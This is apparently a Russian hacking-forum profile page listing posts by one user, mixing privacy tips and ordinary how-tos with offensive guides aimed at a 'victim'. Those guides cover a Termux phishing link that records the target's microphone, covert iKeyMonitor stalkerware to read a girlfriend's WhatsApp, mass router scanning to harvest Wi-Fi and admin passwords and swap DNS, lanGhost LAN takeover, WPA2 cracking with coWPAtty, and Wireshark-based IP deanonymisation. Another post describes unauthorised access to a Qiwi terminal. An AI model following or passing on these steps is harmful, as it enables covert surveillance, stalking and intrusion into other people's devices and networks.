Перейти к содержимому


Контент пользователя roguevad

Найдено 147 записей от roguevad (Поиск ограничен от 05-Май 23)



#28202 Ставим мощную прослушку на чужой телефон

Отправлено по roguevad   19 Июнь 2021 - 02:58 в Делимся опытом.

Приветствую, хакеры! Прослушивать мы будем с помощью обычной ссылки. Создание разберем внизу, но для генерации ссылки обязательно отключите wifi, включите точку доступа и при этом у вас должен быть мобильный интернет.

 

Приступим:

1. Запускаем термукс и вводим данные команды:

• pkg upgrade

• pkg upgrade

• pkg install git 

• pkg install php

• git clone https://github.com/t...choice/sayhello

• git clone https://github.com/M...sa/termux-ngrok

• cd termux-ngrok

• ./termux-ngrok.sh (после этого пишите Y)

• cd

• cd usr

• cd bin

• cp ngrok /data/data/com.termux/files/home/sayhello/

• cd sayhello

• chmod +x sayhello.sh

• ./sayhello.sh

 

2. После этого у вас откроется "SayHello". 

Выбираем в ней Ngrok-02 и спустя пару секунд cгенерируется нужная нам ссылка, на скриншоте – ТЫК она обведена в красный овал, её нужно будет отправить жертве, и если она разрешит доступ к микрофону, то в Termux будут писаться Audio file received. 

 

3. Для того, чтобы перенести во внутреннюю память аудио напишите:

• termux-setup-storage

• cp (название аудио файла, посмотреть название можно написав ls) /storage/emulated/0/

 

После этого аудио файлы сохранятся в формате .wav, а найти их можно во внутренней памяти.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28203 Становимся взломщиками WhatsApp и следим за своей девушкой

Отправлено по roguevad   28 Июнь 2021 - 12:55 в Делимся опытом.

Приветствую, хакеры! Хочу рассказать про приложение, которое способно записывать сообщения и в реальном времени отправлять их вам. Вы можете видеть все сообщения жертвы каждый раз, как только она заходит в онлайн. К сожалению, приложение платное, но доступен 7-ми дневный пробный период. Внизу вы можете наблюдать инструкцию о том, как установить и использовать эту софтину.

1. Ссылка на сайт - ikeymonitor.com, выбирайте полную версию и регистрируйтесь. 

d3a35b0efad2b5e6040a2.png

2. Выберите девайс жертвы и тип устройства, продолжайте регистрацию дальше. 

c1d36dcaafdb57b27f921.png

3. Проверьте почту, туда упадут данные для входа.

b2db4fc4d87790667168d.png

4. После входа вы попадете в панель, она выглядит следующим образом. 

2303d05270abbd4ed4859.png

5. Скачайте и установите приложение на устройство вашей жертве. 

97f08b99ad9255efdf39f.png

 Как установить приложение на телефон вашей жертвы - это уже ваши проблемы, используйте навыки СИ. После установки приложения вы получите возможность получать все сообщения в реальном времени, помимо этого вы так же сможете получать информацию с других приложений. 

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28204 Немного о безопасности Qiwi терминалов

Отправлено по roguevad   30 Июнь 2021 - 12:36 в Делимся опытом.

Приветствую, хакеры! Платежные терминалы QIWI есть практически везде. Оплата производится через пополнение кошелька. С помощью QIWI Кошелька вы можете совершить оплату наличными в терминалах QIWI, на сайте QIWI Кошелька или с помощью приложений для социальных сетей и мобильных телефонов. Оплата через QIWI Кошелек осуществляется моментально

Qiwi – сервис для реализации многочисленных операций с виртуальной валютой. Благодаря невысокой комиссии и возможности использования денежных измерителей без прямого вывода платежная система позволяет производить стандартные финансовые платежи экономично.

Как устроен платежный QIWI Терминал

Пока на фоне идет скучный дистанционный урок, я, лазя по документам Вконтакте (через уязвимость, которая уже ни для кого уже не секрет), наткнулся на интересный файл ‘пароли от teamviewer 14’ (сейчас файл уже удален). В нем располагалась таблица с трема колонками, а именно адрес, ID и пароль от TeamViewer… Зайдя по указанным данным, я был неприятно удивлен… Передо мной предстал интерфейс платежного терминала Qiwi… «М-да уж», — подумал я, — «А люди-то там свои персональные данные вводят».

Шарим по терминалу

Начать следует, пожалуй, с характеристик терминала, которые, кстати, очень даже скромны. Средненький процессор AMD Sempron и 2 гигабайта ОЗУ, что по меркам 2021 года очень даже мало (но для терминала сойдет). Установлена на терминале Windows 7 Домашняя базовая (я думал они до сих пор на Windows XP сидят, хе-хе)). Вот скриншот:

LJgYKuL4vnI.jpg?size=807x503&quality=96&

Скриншот №1. Характеристики терминала

 

Затем я скачал и установил на терминал пакет программ (Google Chrome и т. д., а также запустил прямой эфир (стрим) через OBS. Что меня удивило, этим терминалом довольно-таки активно пользовались (и не подозревали, что их личные данные может увидеть любой желающий). В основном, конечно, пополняли свои счета мобильных телефонов, но встречались и те, что выбрасывали деньги на спортивные ставки (мне искренне жаль таких людей), а также оплачивали интернет:

vJZsz8_85Oo.jpg?size=807x641&quality=96&

Скриншот №2.

Человек оплачивает Интернет (номер замазан для сохранения конфиденциальности)

И таких было немало. Как вы понимаете для корпорации такого масштаба как ‘Qiwi’ это просто непозволительно. Я даже представить боюсь, что с этими данными может сделать социальный инженер…

Далее я попробовал запустить Skype на терминале

S5A3veSj4uI.jpg?size=807x639&quality=96&

Скриншот №3. Звонок через Skype на терминале

Кто же слил данные в Интернет?

А причиной столь банального взлома стала халатность и безответственность сотрудника (называть имя которого я не буду). Сразу же после извещения его об этом, файл был удален (для справки, он был загружен еще в марте 2020 года). Скорее всего он испугался, что обо всем станет известно его руководству и он лишится работы.

Выводы

Иногда банальная безответственность становиться причиной столь ужасных сливов. Не нужно быть профессиональным хакером, чтобы получить доступ к персональным данным нескольких десятков клиентов Qiwi. И не удивляйтесь, если в следующий раз, проходя мимо терминала Qiwi, вместо привычного интерфейса Qiwi вы увидите разложенным пасьянс ‘Косынка’ или открытое видео непристойного содержания.

Что необходимо предпринять Qiwi, чтобы избежать такой ситуации в будущем?

Корпорации Qiwi необходимо надежнее выбирать своих посредников, а компаниям, занимающимся, установкой и настройкой оборудования выбирать только квалифицированных работников.

 

 




#28205 Как найти приложения, шпионящие через Facebook?

Отправлено по roguevad   02 Июль 2021 - 01:04 в Делимся опытом.

Приветствую, хакеры! Вокруг Facebook один за другим вспыхивают скандалы, связанные с безопасностью личных данных пользователей. Одним из самых громких за последнее время стал случай, когда компания Cambridge Analytica получила данные более 50 миллионов пользователей без их согласия. Сомнений не остается: Facebook «протекает», и очень сильно. Однако это не повод удалять свой профиль и терять контакты знакомых — гораздо более оптимальным выбором станет выявить приложения, «ворующие» конфиденциальную информацию, и отключить их.

Если вы думаете, что в подобной утечке нет ничего такого, подумайте о том, что Cambridge Analytica получала данные не только самих пользователей, но и всех их контактов. При этом важно понимать, что компания не замешана во взломе — она получала терабайты информации через одно из легальных приложений Facebook.

Как происходит утечка данных

Когда устанавливаете определенные приложения, вы предоставляете им доступ к некоторым разделам профиля, в которых содержится адрес электронной почты, номер телефона, сведения об образовании, место работы, геолокация и т. д. Несмотря на то что Facebook шифрует данные, это не мешает гиганту распродавать ценную информацию о пользователях третьим лицам, например, специалистам маркетинговых агентств для разработки еще более навязчивой рекламы.

Как отключить шпионские приложения Facebook на компьютере

Чтобы данные вашего профиля и ваших друзей не попадали в чужие руки, выполните следующее:

  1. Нажмите на стрелочку в правом верхнем углу страницы Facebook.
  2. Выберите «Настройки и конфиденциальность» > «Проверка конфиденциальности» > «Ваши настройки данных на Facebook» > «Продолжить».
  3. Вы видите список сайтов и приложений, которые недавно использовали вход через Facebook. Удалите ненужные нажатием на соответствующую кнопку.
  4. После ревизии списка нажмите «Далее».

Как ограничить доступ сайтам и приложениям на смартфоне

Если вы пользуетесь приложением Facebook на смартфоне или планшете:

  1. Нажмите на иконку с изображением трех горизонтальный линий.
  2. Тапните на стрелку рядом с разделом «Настройки и конфиденциальность» > «Быстрые настройки конфиденциальности» > проскрольте вниз и откройте подраздел «Проверка основных настроек конфиденциальности» > «Ваши настройки данных на Facebook».
  3. Нажав на кнопку «Продолжить», вы увидите список сайтов и приложений, у которых есть доступ к вашим данным через Facebook.
  4. Удалите всё ненужное и нажмите «Далее».

 

 




#28206 Вирусы которые доведут до поломки не только компьютер, но и вашу психику!

Отправлено по roguevad   04 Июль 2021 - 01:26 в Делимся опытом.

Приветствую, хакеры! Существуют вирусы, которые могу нанести вред не только устройству, но и самому владельцу устройства (например, людям с эпилепсией). Их можно назвать хоррор-вирусы, обычно, они представляют собой что-то вроде хоррор-игры только на рабочем столе. Но некоторые из них могут нанести серьезный вред и самому компьютеру, поэтому в этой статье речь пойдет именно про них.

 

1. MrsMajor2.0.exe

После запуска .exe файла на рабочем столе появляется множество пустых файлов с демоническими иконками и именем «Humans Are Tasty». Включает хоррор звуки и меняет рабочего стола на черный фон. Затем, система перезагружается, и запускается графический интерфейс вируса в котором есть правила, следуя которым можно, при должном желании его отключить. Может существенно нанести вред устройству.

 

2. TheEchoOfFear.exe

Меняет изображение рабочего стола на хоррор-изображение с элементами скримера, появляется таймер, по истечении которого удалит все файлы на жестком диске и повредит систему. Представляет серьезную угрозу.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28208 Узнаём пароли от всех WiFi города

Отправлено по roguevad   09 Июль 2021 - 02:46 в Делимся опытом.

IP-диапазоны

Итак, приступим. Для начала нам нужны IP-диапазоны, тут несколько путей:

1) Диапазоны по городам

Заходим например на https://4it.me/getlistip вбиваем название города и копируем полученный результат

M5CdK2g3QMY.jpg?size=660x653&quality=96&

 

2) Нам нужны ip определённого провайдера

Заходим на https://2ip.ua/ru/se...ice/provider-ip в строку поиска вбиваем либо уже известный ip (например вы решили просканить своего провайдера, можете смело вбивать свой ip) либо вписываете сайт провайдера (гугл поможет).

Io8AouPe7l8.jpg?size=807x450&quality=96&

 

Программа Router Scan 

Нам нужен софт - RouterScan. С помощью него мы и будем сканить диапазоны.

Данный софт советую использовать на виртуалке/дедике, так как на вирустотале вот такая картина:

1fea5f8c48a1f9f1fed7d.png

 

Ну, Windows на виртуальную машину сможет поставить совершенно любой человек. Так что думаю, что тут особых проблем возникнуть не должно.

Далее запускаем софт.

Удаляем диапазоны в колонке, нажимаем ''E'' и вставляем ранее скопированные порты.

Порты можно добавить, но программой выставлены самые распространенные, поэтому больше в настройках ничего не менял

cdbdaad04fdf3a3474d5b.jpg

 

Стартуем.....ждем, курим, пьем чай/пиво и т.д. Часика через 1-3 подходим и видим похожую картину:

7c6e05ac469a561d39bf1.jpg

 

За три часа более 400 уязвимых роутера.

В колонке ''key'' наш пароль

Нажимаем на понравившийся айпи правой кнопкой и выбираем ''открыть в браузере'' открывается админка роутера, вводим лог и пас(если надо)бывает что лог есть, а пасс не нашла прога, вероятнее всего что нужен только лог, а пароля не будет.

Далее уже сами решайте что с этим делать, можно подменит днс, можно настроить впн через этот роутер.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28209 Как звонить с компьютера на обычные телефоны?

Отправлено по roguevad   10 Июль 2021 - 12:43 в Делимся опытом.

Приветствую, хакеры! Если звонки с мобильного телефона требуют наличия SIM-карты, то для звонков с помощью компьютера необходимо стабильное интернет-соединение. Также нужны наушники и микрофон, чтобы слышать собеседника и отвечать ему. Но самое главное — наличие сервиса или программы, через которую будет совершаться звонок.

 

Звонки через мессенджеры

Чтобы совершить звонок через мессенджер, нужно установить версию этой программы для ПК. Скачать ее можно бесплатно на официальном сайте мессенджера.

Важно помнить, что в большинстве случаев такие звонки бесплатны только между пользователями мессенджера. Звонки на номера, которые не зарегистрированы в этой программе, могут быть платными. Ниже рассмотрим популярные мессенджеры, через которые можно совершать звонки с компьютера на телефон.

 

1. Telegram

Десктопная версия Telegram позволяет звонить только на те мобильные номера, владельцы которых уже зарегистрированы в этом мессенджере. Таким образом звонок проходит через компьютер и поступает на телефон собеседника через мобильное приложение Telegram. Чтобы совершить звонок, необходимо выбрать нужный контакт из списка контактов в Telegram, а затем нажать на значок в виде телефонной трубки.

2. Skype

Открыв Skype на компьютере, пользователь может совершить два вида звонка:

  1. Другому пользователю Skype. Для этого необходимо выбрать его в списке контактов и нажать на кнопку аудиосвязи в форме телефонной трубки. Звонок в таком случае будет бесплатным.
  2. Если позвонить необходимо абоненту, который не зарегистрирован в Skype, пользователю нужно открыть вкладку «Звонки» и нажать «Попробовать бесплатно». Здесь пользователю предложат либо пополнить счет, либо воспользоваться одной из доступных акций на бесплатные звонки в определенном регионе (например, бесплатные звонки на месяц на территории России).

3. Viber

Еще один мессенджер, через который можно совершать как платные, так и бесплатные звонки с компьютера на телефон. Если собеседник зарегистрирован в Viber, звонок поступит на его мобильный телефон (это бесплатно). Если позвонить нужно на незарегистрированный в Viber номер, придется пополнить счет.

 

 

Звонки через специальные сайты

Чтобы не скачивать лишние программы, можно обойтись и веб-сервисами (есть как бесплатные, так и платные), которые предлагают услуги звонков через компьютер на телефон.

1. Звонки.Онлайн

Сервис позволяет совершать бесплатные звонки, которые ограничены по времени. Позвонить можно не только в Россию, но и в любую другую страну мира. Чтобы совершить звонок, необходимо зайти на официальный сайт, ввести номер в международном формате и нажать на зеленую телефонную трубку.

Важно! Иногда на этом сервисе появляются неполадки со звонками по России.

2. Zadarma

С помощью этого сайта можно не только звонить через компьютер на обычный телефон, но и отправлять SMS-сообщения. Чтобы совершить звонок необходимо зарегистрироваться, после чего пользователю выдадут небольшое количество бонусных минут, за которые не нужно платить. Преимущество этого сервиса в том, что он позволяет звонить даже на те мобильные устройства, которые не подключены к интернету.

 

 




#28210 Шифруем жёсткий диск — защищаем свои данные!

Отправлено по roguevad   11 Июль 2021 - 12:27 в Делимся опытом.

Приветствую, хакеры! В этой небольшой статье хочу рассказать вам как сделать так, чтобы никто не украл ваши файлы, даже при получении физического доступа к накопителю компьютера, лучше зашифровать собственный диск. Как это сделать на трёх основных операционных системах:

 

Windows. Сама OS позволяет надёжно зашифровать жёсткий диск при помощи пароля или USB-ключа с использованием инструмента BitLocker. В этом материале рассказано, как использовать данный инструмент.

 

Mac OS. На Mac защитить информацию намного проще — в Finder открываем окно и, удерживая клавишу Control, в боковом меню нажимаем на объект, который нужно зашифровать. Дальше кликаем ещё на пару кнопок, следуя данной инструкции.

 

Linux. Процесс шифрования жёсткого диска на Linux проходит гораздо сложнее, чем на предыдущих OS: использовать нужно стандарт LUKS. По ссылке подробный туториал, как это сделать.

 

Для Windows, Mac OS и Linux также есть программа VeraCrypt. Она шифрует не только отдельные разделы жёсткого диска, но и целиком всю OS, очень удобная и полезная вещь.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28211 Как вас могут вычислить, зная ваш ip адрес

Отправлено по roguevad   12 Июль 2021 - 02:11 в Делимся опытом.

Приветствую, хакеры! По разным причинам пользователи в сети пользуются инструментами анонимизации. Мы разберем бесплатные сервисы, которые позволяют получить определенную информацию о IP-адресе.

Htmlweb

htmlweb.ru позволяет определить страну, иногда город и район. Дополнительно есть информация с whois server. В этом пункте можно найти информацию о провайдере, а также контактный телефон и почту для абуз.

aMIPwpwExKM.jpg?size=459x329&quality=96&

 

Getipintel

Сервис getipintel.net определяет по шкале от 0 до 1, какая вероятность использования средств анонимизации. 

-4gwhHOi6PY.jpg?size=559x339&quality=96&

 

Ip-score

ip-score.com/checkip это чекер по разным blacklists. Позволяет определить насколько «чистый адрес». Наличие более чем в 4 списках говорит о том, что IP-адрес имел отношение к спаму, ботнету и т.д. Для того, чтобы посмотреть списки необходимо нажать на «More BLs». 

4Ljnw4t5a-4.jpg?size=807x418&quality=96&

 

Ipqualityscore

ipqualityscore.com/user/proxy-detection-api/lookup. Для проверки необходимо пройти бесплатную регистрации. С помощью этого сервиса можно получить информации об использовании прокси, VPN или TOR. 

lZ9KGVjhSpU.jpg?size=684x516&quality=96&

 

Iknowwhatyoudownload

iknowwhatyoudownload.com/ru/peer/ это ресурс для получения информации о использовании торрент трэкеров. Таким образом, можно узнать, что скачивает пользователь в течение нескольких последних месяцев через торрент (работает только со статическим IP и при условии, что в торренте не активирован прокси). Есть возможность создать зараженную ссылку и отправить ее «жертве». После этого можно смотреть за списком скачанных файлов. 

tv5GqMhjIic.jpg?size=674x254&quality=96&

 

Дополнительной список софта для работы с IP-адресами

  1. XSpider 7.7. Проводит проверку и анализирует порты. Можно получить информацию о занятых портах и уязвимостях.
  2. Shadow Security Scanner. Проводит аудит системы. Определяет операционную систему, название машины, а также дату и время на компьютере.

Таким образом, имея весь набор информации о пользователей, можно использовать для разных целей. Например, некоторые мошенники пытаются шантажировать неопытных пользователей. Среди списка скаченных файлов через торрент (проверить можно iknowwhatyoudownload.com/ru/peer/) могут оказаться видео для взрослых, а также разные другие форматы. И навряд пользователи хотят, чтобы эту информацию видел кто-то другой.

Можно придумать еще 100 разных способов, как использовать всю информацию о IP адресе. Суть статьи – не палить IP-адрес. Для этого нужно не переходить по ссылкам, авторизоваться на разных сервисах и не использовать непроверенный софт. Для этих целей можно использовать виртуальную машину.

Ну а дальше я думаю ты понимаешь, что может случится, когда твои все данные попадут в руки опытному мошеннику, он может просить у тебя все что захочет, ведь в его руках будет вся информация о тебе, которую можно распространить не в лучшем свете. 

 

 




#28212 Аналоги поисковой системы Shodan!

Отправлено по roguevad   13 Июль 2021 - 02:29 в Делимся опытом.

Приветствую, хакеры! О поисковике подключенных к глобальной сети устройств под названием Shodan знают многие, что не скажешь о более качественных его аналогах. Что интересно, подобные поисковые системы в нынешнее время пользуются высокой популярностью в Китае. Об этом свидетельствуют доминирующие позиции тамошних поисковиков на глобальном рынке. Давайте рассмотрим несколько потенциальных конкурентов Shodan.

 

1. FOFA.so — Это один из представителей поисковиков китайского сегмента. Имеет конкурентноспособный результат поиска по запросу "port: 80" - 5 804 777 устройств. Для сравнения Shodan находит всего 246 996. Единственный минус сервиса - основные части интерфейса на китайском, однако присутствует и английский, в описании устройств, к примеру. Система поисковых запросов у FOFA.so схожа с Shodan, во всяком случае можно попробовать перевести документацию.

 

2. ZoomEye — Результат поиска по запросу "port: 80" у данного поисковика составляет 318 893 041, что является абсолютным рекордом списка. ZoomEye имеет качественный английский интерфейс, и, что самое интересное, документация также переведена на английский. Присутствует API. Система поисковых запросов схожа с Shodan, но с небольшими дополнениями.

 

3. Censys — Данный поисковик слабее предшественников, однако все равно может создать конкуренцию Shodan. Разрабатывается командой из Мичигана, США, соответственно язык интерфейса исключительно английский. Отличительной особенностью Censys является обязательная регистрация, без которой невозможно совершить запрос.

 

 

 




#28213 Как создать сайт новичку

Отправлено по roguevad   14 Июль 2021 - 01:05 в Делимся опытом.

Начало

Скачиваем OpenServer по ссылке: Официальный сайт

Программа является бесплатной, для наших целей будет достаточно базовой версии.

Кстати, с офф. сайта скачиваться будет с низкой скоростью - нужно либо задонатить разработчику небольшую сумму, либо скачать с торрента ( я вам про это ничего не говорил).

После скачивания установщика, запускаем его. Выбираем папку, в которую будет распакована программа, нажимаем «ОК».

 

После завершения распаковки, переходим в папку, которую выбрали в процессе. Запускаем программу.

Выбираем язык, который будет предложен вам.

Если программа запускается впервые, Вам могут предложить установить патчи для Microsoft Visual C++.

В трее у вас появится флажок.Нажимаем правой кнопкой - настройки.

в разделе модули выставляем +- такие версии PHP,MySQL.

b63a3fa184b240ce96d9c.png

 

Сохраняем, после этого запускаем сервер. Нажимаем правой кнопкой - Запуск.

После успешного запуска цвет должен поменяться на зелёный.

dcc9c1e3dabc6cb0cd7f7.png

 

В разделе дополнительно открываем PhpMyAdmin.

Логин: root

Пароль: root

Или:

Логин: mysql

Пароль: mysql

или:

Логин: root

Пароль пустой

Так же можно попробовать mysql mysql

 

9198691a4af92c5385eb5.png

 

Создадим БД для нашего будущего сайта. Нажимаем Создать БД

4f564823231bfef13dead.png

 

Вводим имя БД на латинице.Выбираем в правой колонке utf8_general_ci, и нажимаем создать.

f5dd39c6dcc7653a2ee6b.png

 

 

Установка WordPress

Переходим по ссылке и скачиваем WP.

c29a4c423fb513970920f.png

 

После завершения скачивания, переходим в папку с OpenServer - domains

Здесь создаём папку под ваш сайт с необходимым названием (primer, primer.com, primer-saita.ru и тд)

 

Если вам неважно название, то можно использовать уже находящуюся папку localhost (перед этим удалите файлы в ней).

Содержимое архива с WordPress распаковываем в папку которую создали/localhost.

ab01ae73bc504a57e57e0.png

 

теперь перезапускаем OpenServer

7b8f3ba18b9cd77bb1cda.png

 

После этого, в разделе мои проекты вы увидите вашу папку сайта:

переходим по ней

47976810923664730ddbc.png

 

Откроется окно настройки WP. нажимаем вперёд:

5a482c6284d5ad7c1eac3.png

 

Если вы хотите создать другую учётку, то в MySQL выбираем учетные записи пользователей - добавить, указываем имя, пароль, и повторно вводим пароль для проверки.

Вводим имя БД, которую создавали в MySQL. Вводим имя и пароль учётки от БД, остальное не трогаем.

Запускаем установку и указываем название для нашего сайта, логин и пароль для учетки в WP, Email.

Выполняем вход. Готово! мы в админке. Теперь можем менять внешний вид сайта, заполнять контентом и т.д

 

 

 




#28215 Узнаем IP пользователя через Вконтакте

Отправлено по roguevad   16 Июль 2021 - 01:39 в Делимся опытом.

Приветствую, хакеры! Сегодня мы научимся "деанонить" юзеров ВК, а именно - узнавать их IP-адрес. В данной ситуации фейк страница не спасёт, но спасёт обычный VPN/proxy.

 

XV08DQ3LM0U.jpg?size=807x807&quality=96&

 

Вот Вам мини-гайд о том как заполучить этот самый ip. Сам ВК его пока не показывает (Ключевое слово ПОКА). Значит будем добывать его сами (что очень легко).

Для данных деяний нам понадобится:

  • Прямые руки и мозг (Куда же без этого)
  • Программа Wireshark
  • Плагин npcap

Приступим:

Скачиваем программу wireshark c офф сайта

Заходим и выбираем наше текущее подключение к интернету (У меня это Ethernet у вас может быть другое название)

w-Ma7lXXe88.jpg?size=807x430&quality=96&

 

w-Ma7lXXe88.jpg?size=807x430&quality=96&

 

Далее начинаем захват трафика, нажав правой кнопкой мыши по текущему подключению и выбрав захват. После чего советую резко остановить захват пакетов, нажав на красный квадратик слева сверху (так будет удобнее искать необходимую нам строку с ip адресом)

_UUBJgCigIY.jpg?size=505x56&quality=96&s

 

Далее звоним жертве, заранее запустив захват пакетов, нажав на плавник акулы(самое главное, чтобы жертва приняла звонок, иначе ничего не выйдет). Также советую закрыть все вкладки и использовать браузер, который не отправляет ненужные пакеты туда сюда, к примеру тот же edge.

sVpv-DgtFOA.jpg?size=271x77&quality=96&s

 

После того как жертва ответила, идём останавливать захват пакетов всё тем же квадратиком и приступаем к поиску ip адреса.

Собственно поиск. После остановки листаем по всему логу и ищем подобную строку:

ufs1-GgKFB0.jpg?size=423x28&quality=96&s

 

Тут у нас указан исходящий от нашего ip пакет данных на принимающий ip жертвы. И дабы убедиться, что это ip жертвы, а не левый ip, нам достаточно пролистнуть ниже, где мы увидим обильный обмен пакетами данных между нашим ip и тем же ip, что мы видели раньше.

JUkl7kGvy0k.jpg?size=725x247&quality=96&

 

 

 




#28216 Взлом пк по локальной сети

Отправлено по roguevad   17 Июль 2021 - 02:09 в Делимся опытом.

Приветствую, хакеры! В этой небольшой статье я хотел бы рассказать о способе взлома компьютера через локальную сеть. Нам необходимо скачать программу LanGhost: управление пк в локальной сети. Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации и прочим серьезным последствиям.

 

Установка:

 

   apt update

   apt upgrade

   apt install git python

   git clone https://github.com/xdavidhu/lanGhost

   pkg install tsu

   tsu

 

Запуск:

 

   cd LanGhost

   ./setup.py

 

Далее надо настроить lanGhost в 4 этапа. В первом нам нужно просто согласиться. Во втором прописать API созданного Телеграм бота(Fatherbot), и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту. После этого все готово к дальнейшей работе, можете использовать эту систему по назначению.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28217 Взлом Wifi паролей WPA2-PSK с помощью Cowpatty

Отправлено по roguevad   19 Июль 2021 - 01:56 в Делимся опытом.

Приветствую, хакеры! В данном руководстве мы воспользуемся утилитой, разработанной специалистом по безопасности беспроводных сетей Джошуа Райтом, под названием cowpatty (чаще всего, пишут coWPAtty). Это приложение упрощает и ускоряет гибридную/словарную атаку на пароли WPA2. Итак, давайте приступим к работе!

 

 

 

Шаг 1: Найдите Cowpatty

Cowpatty - одна из сотен полезных утилит, входящих в состав набора программного обеспечения Kali Linux. По какой-то причине, её нет в директории /pentest/wireless. Вместо этого данное приложение находится в папке /usr/local/bin, так что давайте её откроем.

Код:

cd /usr/local/bin

Поскольку cowpatty находится в директории /usr/local/bin, и эта директория должна быть в нашей переменной PATH, её запуск возможен из любой папки в Kali Linux.

 

Шаг 2: Найдите экран помощи Cowpatty

Чтобы получить краткий обзор опций cowpatty, просто введите:

Код:

cowpatty

Najdite-jekran-pomoshhi-Cowpatty-2.png

 

 

 

Kali Linux предоставит вам небольшой экран помощи. Обратите внимание, что cowpatty требуются следующие данные для работы:

  • список слов
  • файл с сохранённым хэшем пароля
  • SSID точки доступа, которую мы будем взламывать

Шаг 3: Переключите беспроводной адаптер в режим мониторинга

Как и во время взлома пароля с помощью aircrack-ng, нам нужно переключить беспроводной адаптер в режим мониторинга.

Код:

airmon-ng start wlan0

Perekljuchite-besprovodnoj-adapter-v-rez

 

 

 

Шаг 4: Создайте файл для перехвата

Далее, нам необходимо создать файл, в котором будет храниться хешированный пароль, перехваченный в процессе 4-стороннего рукопожатия.

Код:

airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0

 

Эта команда запустит дамп на выбранной точке доступа (00:25:9C:97:4F:48), указанном канале (-c 9) и сохранит хэш в файл под названием cowcrack.

 

Шаг 5: Перехватите рукопожатие

Теперь, когда кто-то подключится к точке доступа, мы перехватим хэш. Airdump-ng уведомит нас об этом посредством сообщения в правом верхнем углу.

 

Perehvatite-rukopozhatie-55555.png

 

 

Шаг 6: Запустите Cowpatty

После получения хэша пароля, мы можем использовать cowpatty вместе с нашим списком слов для его взлома.

Код:

cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2

Zapustite-Cowpatty-62452.png

 

Как вы можете видеть на скриншоте выше, cowpatty генерирует хэш для каждого слова в нашем списке с SSID в качестве сида и сравнивает его с перехваченным хэшем. Как только хэш совпадёт, утилита отобразит пароль для точки доступа на экране.

 

Шаг 7: Создайте свой собственный хэш

Хотя cowpatty - довольно простая в использовании утилита, она иногда бывает очень медленной. Хэш пароля создаётся с помощью алгоритма SHA1, а в качестве сида выступает значение SSID. Это значит, что у одного и того же пароля будут разные хэши для точек доступа с разными SSID. Это не позволяет нам использовать одну и ту же таблицу для всех точек доступа. Утилита cowpatty должна взять предоставленный вами список паролей и вычислить хэш каждого из них с учётом заданного SSID. Это очень медленная задача, сильно нагружающая процессор.

 

Сейчас cowpatty поддерживает работу с уже готовым файлом хэшей, что ускоряет взлом пароля WPA2-PSK почти в 1000 раз! Файлы с предварительно вычисленными хэшами можно найти в интернете. Эти файлы были сгенерированы с использованием 172000 словарных файлов и 1000 самых популярных SSID. Однако если ваш SSID не входит в эту 1000, данный список хэшей нам ничем не поможет.

 

В этом случае нам придётся сгенерировать свой собственный список хэшей на базе SSID нашей точки доступа. Это можно сделать с помощью приложения под названием genpmk. Чтобы создать файл хэшей для списка слов «darkcode» и SSID «Mandela2», введите:

Код:

genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Sozdajte-svoj-sobstvennyj-hjesh-77.png

 

 

Шаг 8: Использование нашего хэша

После генерации списка хэшей для определённого SSID, мы можем приступить к взлому пароля с помощью cowpatty, выполнив следующую команду:

Код:

cowpatty -d hashfile -r dumpfile -s ssid

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28218 Взламываем whatsapp и следим за чатами

Отправлено по roguevad   20 Июль 2021 - 01:30 в Делимся опытом.

Приветствую, хакеры! Данное приложение способно записывать сообщения и в реальном времени отправлять их вам. Вы можете видеть все сообщения жертвы каждый раз, как только она заходит в онлайн.

1. Ссылка на сайт - ikeymonitor.com, выбирайте полную версию и регистрируйтесь. 

d3a35b0efad2b5e6040a2.png

 

2. Выберите девайс жертвы и тип устройства, продолжайте регистрацию дальше. 

c1d36dcaafdb57b27f921.png

 

3. Проверьте почту, туда упадут данные для входа.

b2db4fc4d87790667168d.png

 

4. После входа вы попадете в панель, она выглядит следующим образом. 

2303d05270abbd4ed4859.png

 

5. Скачайте и установите приложение на устройство вашей жертве. 

97f08b99ad9255efdf39f.png

 

 Как установить приложение на телефон вашей жертвы - это уже ваши проблемы, используйте навыки СИ. После установки приложения вы получите возможность получать все сообщения в реальном времени, помимо этого вы так же сможете получать информацию с других приложений. Полученные навыки можно применить для заработка и не только, если есть хорошие навыки СИ.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28219 Используем смартфон в качестве веб-камеры

Отправлено по roguevad   27 Июль 2021 - 02:06 в Делимся опытом.

Приветствую, хакеры! Вы можете использовать свой смартфон Android (как переднюю, так и заднюю камеру) в качестве беспроводной веб-камеры, при помощи приложения DroidCam на Android и DroidCam Client на Windows 10. Оно работает с большинством популярных приложений для видеовызовов в Windows (кроме Skype из Microsoft Store).

 

1. Установите DroidCam для Android и DroidCam Client для Windows;

2. Убедитесь, что телефон и компьютер находятся в одной сети Wi-Fi;

3. Откройте приложение Android DroidCam и предоставьте ему разрешение на доступ к камере и микрофону;

4. После ознакомления с руководством вы увидите главный экран приложения, который содержит сведения о подключении к Wi-Fi;

5. На вашем компьютере откройте DroidCam Client;

6. Нажмите кнопку Wi-Fi, чтобы начать процесс подключения;

7. Введите IP-адрес устройства из Android приложения DroidCam;

8. Можете включить опцию "Audio", чтобы использовать микрофон вашего телефона;

9. Нажмите "Start";

10. Поздравляю, вы великолепны!

 

Камера Android смартфона теперь используется как веб-камера. Вы можете увидеть картинку прямо в приложении DroidCam на Android.

 

